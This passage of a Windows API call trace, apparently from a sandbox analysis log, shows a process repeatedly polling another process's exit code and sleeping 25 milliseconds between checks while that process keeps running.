lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.459] Sleep (dwMilliseconds=0x19) [0155.501] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.501] Sleep (dwMilliseconds=0x19) [0155.559] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.559] Sleep (dwMilliseconds=0x19) [0155.614] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.614] Sleep (dwMilliseconds=0x19) [0155.665] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.665] Sleep (dwMilliseconds=0x19) [0155.712] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.713] Sleep (dwMilliseconds=0x19) [0155.858] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.859] Sleep (dwMilliseconds=0x19) [0155.936] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.936] Sleep (dwMilliseconds=0x19) [0156.000] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.000] Sleep (dwMilliseconds=0x19) [0156.090] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.090] Sleep (dwMilliseconds=0x19) [0156.126] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.127] Sleep (dwMilliseconds=0x19) [0156.172] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.172] Sleep (dwMilliseconds=0x19) [0156.287] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.287] Sleep (dwMilliseconds=0x19) [0156.324] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.324] Sleep (dwMilliseconds=0x19) [0156.379] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.379] Sleep (dwMilliseconds=0x19) [0156.443] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.443] Sleep (dwMilliseconds=0x19) [0156.526] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.526] Sleep (dwMilliseconds=0x19) [0156.624] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.624] Sleep (dwMilliseconds=0x19) [0156.707] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.707] Sleep (dwMilliseconds=0x19) [0156.761] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.768] Sleep (dwMilliseconds=0x19) [0156.823] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.823] Sleep (dwMilliseconds=0x19) [0156.858] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.858] Sleep (dwMilliseconds=0x19) [0156.912] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.913] Sleep (dwMilliseconds=0x19) [0156.949] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.949] Sleep (dwMilliseconds=0x19) [0156.988] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0156.988] Sleep (dwMilliseconds=0x19) [0157.025] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.025] Sleep (dwMilliseconds=0x19) [0157.205] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.205] Sleep (dwMilliseconds=0x19) [0157.249] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.249] Sleep (dwMilliseconds=0x19) [0157.291] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.291] Sleep (dwMilliseconds=0x19) [0157.326] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.326] Sleep (dwMilliseconds=0x19) [0157.379] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.380] Sleep (dwMilliseconds=0x19) [0157.469] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.469] Sleep (dwMilliseconds=0x19) [0157.526] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.526] Sleep (dwMilliseconds=0x19) [0157.575] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.575] Sleep (dwMilliseconds=0x19) [0157.639] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.639] Sleep (dwMilliseconds=0x19) [0157.682] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.682] Sleep (dwMilliseconds=0x19) [0157.735] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.735] Sleep (dwMilliseconds=0x19) [0157.780] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.780] Sleep (dwMilliseconds=0x19) [0157.828] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.828] Sleep (dwMilliseconds=0x19) [0157.901] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.902] Sleep (dwMilliseconds=0x19) [0157.932] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.932] Sleep (dwMilliseconds=0x19) [0157.981] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0157.981] Sleep (dwMilliseconds=0x19) [0158.018] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.018] Sleep (dwMilliseconds=0x19) [0158.114] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.114] Sleep (dwMilliseconds=0x19) [0158.153] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.153] Sleep (dwMilliseconds=0x19) [0158.193] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.193] Sleep (dwMilliseconds=0x19) [0158.243] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.243] Sleep (dwMilliseconds=0x19) [0158.320] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.320] Sleep (dwMilliseconds=0x19) [0158.364] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.364] Sleep (dwMilliseconds=0x19) [0158.445] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.445] Sleep (dwMilliseconds=0x19) [0158.514] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.514] Sleep (dwMilliseconds=0x19) [0158.553] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.553] Sleep (dwMilliseconds=0x19) [0158.593] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.593] Sleep (dwMilliseconds=0x19) [0158.684] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.684] Sleep (dwMilliseconds=0x19) [0158.724] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.724] Sleep (dwMilliseconds=0x19) [0158.759] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.760] Sleep (dwMilliseconds=0x19) [0158.804] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.804] Sleep (dwMilliseconds=0x19) [0158.903] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.905] Sleep (dwMilliseconds=0x19) [0158.979] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0158.979] Sleep (dwMilliseconds=0x19) [0159.021] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.021] Sleep (dwMilliseconds=0x19) [0159.139] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.139] Sleep (dwMilliseconds=0x19) [0159.178] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.178] Sleep (dwMilliseconds=0x19) [0159.215] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.215] Sleep (dwMilliseconds=0x19) [0159.252] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.253] Sleep (dwMilliseconds=0x19) [0159.289] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.289] Sleep (dwMilliseconds=0x19) [0159.398] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.398] Sleep (dwMilliseconds=0x19) [0159.472] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.472] Sleep (dwMilliseconds=0x19) [0159.541] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.541] Sleep (dwMilliseconds=0x19) [0159.605] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.605] Sleep (dwMilliseconds=0x19) [0159.659] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.659] Sleep (dwMilliseconds=0x19) [0159.704] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.704] Sleep (dwMilliseconds=0x19) [0159.742] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.742] Sleep (dwMilliseconds=0x19) [0159.784] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.784] Sleep (dwMilliseconds=0x19) [0159.821] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.821] Sleep (dwMilliseconds=0x19) [0159.856] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.856] Sleep (dwMilliseconds=0x19) [0159.906] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0159.906] Sleep (dwMilliseconds=0x19) [0160.008] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.008] Sleep (dwMilliseconds=0x19) [0160.158] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.158] Sleep (dwMilliseconds=0x19) [0160.201] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.201] Sleep (dwMilliseconds=0x19) [0160.236] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.236] Sleep (dwMilliseconds=0x19) [0160.273] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.273] Sleep (dwMilliseconds=0x19) [0160.315] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.315] Sleep (dwMilliseconds=0x19) [0160.386] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.386] Sleep (dwMilliseconds=0x19) [0160.453] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.453] Sleep (dwMilliseconds=0x19) [0160.568] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.568] Sleep (dwMilliseconds=0x19) [0160.612] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.612] Sleep (dwMilliseconds=0x19) [0160.648] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.648] Sleep (dwMilliseconds=0x19) [0160.684] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.684] Sleep (dwMilliseconds=0x19) [0160.722] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.722] Sleep (dwMilliseconds=0x19) [0160.763] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.763] Sleep (dwMilliseconds=0x19) [0160.800] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.800] Sleep (dwMilliseconds=0x19) [0160.853] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.853] Sleep (dwMilliseconds=0x19) [0160.904] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.904] Sleep (dwMilliseconds=0x19) [0160.940] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.940] Sleep (dwMilliseconds=0x19) [0160.979] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0160.979] Sleep (dwMilliseconds=0x19) [0161.015] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.015] Sleep (dwMilliseconds=0x19) [0161.168] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.168] Sleep (dwMilliseconds=0x19) [0161.237] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.237] Sleep (dwMilliseconds=0x19) [0161.273] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.273] Sleep (dwMilliseconds=0x19) [0161.317] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.317] Sleep (dwMilliseconds=0x19) [0161.387] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.387] Sleep (dwMilliseconds=0x19) [0161.440] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.440] Sleep (dwMilliseconds=0x19) [0161.480] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.480] Sleep (dwMilliseconds=0x19) [0161.517] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.517] Sleep (dwMilliseconds=0x19) [0161.554] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.554] Sleep (dwMilliseconds=0x19) [0161.591] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.591] Sleep (dwMilliseconds=0x19) [0161.626] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.626] Sleep (dwMilliseconds=0x19) [0161.661] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.661] Sleep (dwMilliseconds=0x19) [0161.808] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.808] Sleep (dwMilliseconds=0x19) [0161.849] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.849] Sleep (dwMilliseconds=0x19) [0161.897] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.897] Sleep (dwMilliseconds=0x19) [0161.936] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.937] Sleep (dwMilliseconds=0x19) [0161.973] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0161.973] Sleep (dwMilliseconds=0x19) [0162.010] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.010] Sleep (dwMilliseconds=0x19) [0162.154] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.154] Sleep (dwMilliseconds=0x19) [0162.195] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.195] Sleep (dwMilliseconds=0x19) [0162.240] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.240] Sleep (dwMilliseconds=0x19) [0162.278] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.278] Sleep (dwMilliseconds=0x19) [0162.314] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.314] Sleep (dwMilliseconds=0x19) [0162.348] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.348] Sleep (dwMilliseconds=0x19) [0162.385] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.385] Sleep (dwMilliseconds=0x19) [0162.425] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.425] Sleep (dwMilliseconds=0x19) [0162.462] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.462] Sleep (dwMilliseconds=0x19) [0162.498] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.498] Sleep (dwMilliseconds=0x19) [0162.549] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.549] Sleep (dwMilliseconds=0x19) [0162.593] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.593] Sleep (dwMilliseconds=0x19) [0162.658] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.658] Sleep (dwMilliseconds=0x19) [0162.702] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.702] Sleep (dwMilliseconds=0x19) [0162.772] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.772] Sleep (dwMilliseconds=0x19) [0162.840] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.840] Sleep (dwMilliseconds=0x19) [0162.898] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.898] Sleep (dwMilliseconds=0x19) [0162.934] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.934] Sleep (dwMilliseconds=0x19) [0162.989] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0162.989] Sleep (dwMilliseconds=0x19) [0163.031] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0163.031] Sleep (dwMilliseconds=0x19) [0163.198] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0163.198] Sleep (dwMilliseconds=0x19) [0163.240] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0163.240] Sleep (dwMilliseconds=0x19) [0163.282] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0163.282] Sleep (dwMilliseconds=0x19) [0163.323] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0163.323] Sleep (dwMilliseconds=0x19) [0163.366] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0163.367] Sleep (dwMilliseconds=0x19) [0163.410] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0163.410] Sleep (dwMilliseconds=0x19) [0163.492] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0163.492] Sleep (dwMilliseconds=0x19) [0163.599] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0163.601] Sleep (dwMilliseconds=0x19) [0163.742] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0163.743] Sleep (dwMilliseconds=0x19) [0163.780] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0163.780] Sleep (dwMilliseconds=0x19) [0163.843] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0163.843] Sleep (dwMilliseconds=0x19) [0163.919] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0163.919] Sleep (dwMilliseconds=0x19) [0163.975] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0163.975] Sleep (dwMilliseconds=0x19) [0164.037] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.037] Sleep (dwMilliseconds=0x19) [0164.283] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.283] Sleep (dwMilliseconds=0x19) [0164.339] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.339] Sleep (dwMilliseconds=0x19) [0164.373] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.374] Sleep (dwMilliseconds=0x19) [0164.422] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.422] Sleep (dwMilliseconds=0x19) [0164.464] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.464] Sleep (dwMilliseconds=0x19) [0164.508] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.508] Sleep (dwMilliseconds=0x19) [0164.545] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.545] Sleep (dwMilliseconds=0x19) [0164.608] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.609] Sleep (dwMilliseconds=0x19) [0164.656] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.656] Sleep (dwMilliseconds=0x19) [0164.709] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.709] Sleep (dwMilliseconds=0x19) [0164.748] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.749] Sleep (dwMilliseconds=0x19) [0164.789] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0164.789] Sleep 